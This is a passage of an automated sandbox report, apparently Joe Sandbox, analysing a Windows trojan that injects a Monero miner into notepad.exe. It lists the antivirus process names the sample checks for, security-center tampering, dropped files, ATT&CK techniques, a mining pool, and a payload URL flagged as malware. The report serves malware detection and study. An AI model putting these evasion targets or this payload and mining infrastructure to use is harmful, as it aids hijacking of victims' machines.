                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings:

                        barindex
                        Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                        Source: 4rC1bQcnl5.exeBinary or memory string: bdagent.exe
                        Source: 4rC1bQcnl5.exeBinary or memory string: cmdagent.exe
                        Source: 4rC1bQcnl5.exeBinary or memory string: vsserv.exe
                        Source: 4rC1bQcnl5.exeBinary or memory string: cfp.exe
                        Source: 4rC1bQcnl5.exeBinary or memory string: avp.exe
                        Source: 4rC1bQcnl5.exeBinary or memory string: a2start.exe
                        Source: svchost.exe, 0000000D.00000002.494378144.0000016881F02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: 4rC1bQcnl5.exeBinary or memory string: a2guard.exe
                        Source: svchost.exe, 0000000D.00000002.494299228.0000016881E3D000.00000004.00000001.sdmpBinary or memory string: $@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: 4rC1bQcnl5.exeBinary or memory string: a2service.exe
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation1Startup Items1Startup Items1Masquerading21Input Capture1Security Software Discovery241Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsCommand and Scripting Interpreter2Registry Run Keys / Startup Folder2Process Injection622Disable or Modify Tools11LSASS MemoryVirtualization/Sandbox Evasion31Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsScripting11DLL Side-Loading1Registry Run Keys / Startup Folder2Virtualization/Sandbox Evasion31Security Account ManagerProcess Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsNative API1Logon Script (Mac)DLL Side-Loading1Process Injection622NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonScripting11Cached Domain CredentialsSystem Information Discovery23VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 453466 Sample: 4rC1bQcnl5 Startdate: 23/07/2021 Architecture: WINDOWS Score: 100 56 xmr-us-east1.nanopool.org 2->56 66 Malicious sample detected (through community Yara rule) 2->66 68 Antivirus detection for URL or domain 2->68 70 Multi AV Scanner detection for dropped file 2->70 72 9 other signatures 2->72 9 4rC1bQcnl5.exe 5 2->9         started        13 svchost.exe 2->13         started        15 svchost.exe 9 1 2->15         started        18 8 other processes 2->18 signatures3 process4 dnsIp5 50 C:\Users\user\AppData\...\4rC1bQcnl5.exe, PE32 9->50 dropped 52 C:\Users\...\4rC1bQcnl5.exe:Zone.Identifier, ASCII 9->52 dropped 54 C:\Users\user\AppData\...\4rC1bQcnl5.exe.log, ASCII 9->54 dropped 84 Writes to foreign memory regions 9->84 86 Injects a PE file into a foreign processes 9->86 20 4rC1bQcnl5.exe 6 9->20         started        25 4rC1bQcnl5.exe 9->25         started        88 Changes security center settings (notifications, updates, antivirus, firewall) 13->88 27 MpCmdRun.exe 1 13->27         started        64 127.0.0.1 unknown unknown 15->64 file6 signatures7 process8 dnsIp9 58 45.144.225.135, 49717, 80 DEDIPATH-LLCUS Netherlands 20->58 44 C:\ProgramData\LKBNMTFJgl\csrss, PE32 20->44 dropped 46 C:\ProgramData\LKBNMTFJgl\r.vbs, data 20->46 dropped 74 Writes to foreign memory regions 20->74 76 Allocates memory in foreign processes 20->76 78 Modifies the context of a thread in another process (thread injection) 20->78 82 2 other signatures 20->82 29 notepad.exe 20->29         started        33 cmd.exe 1 20->33         started        35 oQOWFbKllEKo.exe 20->35 injected 80 Multi AV Scanner detection for dropped file 25->80 37 conhost.exe 27->37         started        file10 signatures11 process12 dnsIp13 60 192.99.69.170, 14444, 49718, 49728 OVHFR Canada 29->60 62 xmr-us-east1.nanopool.org 29->62 90 System process connects to network (likely due to code injection or exploit) 29->90 39 wscript.exe 1 33->39         started        42 conhost.exe 33->42         started        signatures14 92 Detected Stratum mining protocol 60->92 process15 file16 48 C:\Users\user\AppData\...\viTRMUuKeV.url, MS 39->48 dropped

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        4rC1bQcnl5.exe17%VirustotalBrowse
                        4rC1bQcnl5.exe24%ReversingLabsWin32.Trojan.Pwsx

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\LKBNMTFJgl\csrss24%ReversingLabsWin32.Trojan.Pwsx
                        C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe24%ReversingLabsWin32.Trojan.Pwsx

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        17.0.oQOWFbKllEKo.exe.1460000.3.unpack100%AviraTR/ATRAPS.GenDownload File
                        16.2.4rC1bQcnl5.exe.37c0000.4.unpack100%AviraTR/Dropper.GenDownload File
                        17.0.oQOWFbKllEKo.exe.1460000.5.unpack100%AviraTR/ATRAPS.GenDownload File
                        17.0.oQOWFbKllEKo.exe.1460000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                        16.2.4rC1bQcnl5.exe.4f3c38.0.unpack100%AviraHEUR/AGEN.1127349Download File
                        16.2.4rC1bQcnl5.exe.400000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                        17.2.oQOWFbKllEKo.exe.1460000.1.unpack100%AviraTR/ATRAPS.GenDownload File

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://xmrig.com/wizardOKcpurandomxversioncpuintensitythreadsaffinity0%Avira URL Cloudsafe
                        http://45.144.225.135/notepad.exe100%Avira URL Cloudmalware
                        http://45.144.225.135/config.txt0%Avira URL Cloudsafe
                        http://www.fontbureau.comion0%URL Reputationsafe
                        https://xmrig.com/wizard0%URL Reputationsafe
                        https://%s.xboxlive.com0%URL Reputationsafe
                        https://dynamic.t0%URL Reputationsafe
                        http://www.fontbureau.comm0%URL Reputationsafe
                        https://xmrig.com/docs/algorithms0%URL Reputationsafe
                        https://RtlGetVersionntdll.dll0%Avira URL Cloudsafe
                        https://%s.dnet.xboxlive.com0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        xmr-us-east1.nanopool.org
                        		144.217.14.139
                        		truefalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://45.144.225.135/config.txtfalse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpfalse
                            		high
                            https://xmrig.com/wizardOKcpurandomxversioncpuintensitythreadsaffinitynotepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://45.144.225.135/notepad.exe4rC1bQcnl5.exetrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000003.306593475.000002B69C445000.00000004.00000001.sdmpfalse
                              		high
                              https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmpfalse
                                		high
                                https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpfalse
                                  		high
                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmpfalse
                                    		high
                                    https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpfalse
                                      		high
                                      https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmpfalse
                                        		high
                                        https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmpfalse
                                          		high
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmpfalse
                                            		high
                                            https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpfalse
                                              		high
                                              https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2004/09/enumesvchost.exe, 00000005.00000002.494582549.0000015D344A3000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.comion4rC1bQcnl5.exe, 00000000.00000002.325812504.0000000001887000.00000004.00000040.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000002.306846674.000002B69C413000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://xmrig.com/wizardnotepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://%s.xboxlive.comsvchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		low
                                                      https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 00000005.00000002.498728475.0000015D39DF0000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressingsvchost.exe, 00000005.00000002.494582549.0000015D344A3000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://dynamic.tsvchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.fontbureau.comm4rC1bQcnl5.exe, 00000000.00000002.325812504.0000000001887000.00000004.00000040.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://iconscout.com/legal#licenses4rC1bQcnl5.exefalse
                                                                                  		high
                                                                                  https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://xmrig.com/docs/algorithmsnotepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://activity.windows.comsvchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.bingmapsportal.comsvchost.exe, 0000000B.00000002.306846674.000002B69C413000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://RtlGetVersionntdll.dll4rC1bQcnl5.exe, 00000000.00000002.326329600.0000000003287000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		low
                                                                                                https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpfalse
                                                                                                    		high

                                                                                                    Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    45.144.225.135
                                                                                                    		unknownNetherlands
                                                                                                    		35913DEDIPATH-LLCUSfalse
                                                                                                    192.99.69.170
                                                                                                    		unknownCanada
                                                                                                    		16276OVHFRtrue

                                                                                                    Private

                                                                                                    IP
                                                                                                    127.0.0.1

                                                                                                    General Information

                                                                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                                                                    Analysis ID:453466
                                                                                                    Start date:23.07.2021
                                                                                                    Start time:22:23:14
                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                    Overall analysis duration:0h 12m 19s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Sample file name:4rC1bQcnl5 (renamed file extension from none to exe)
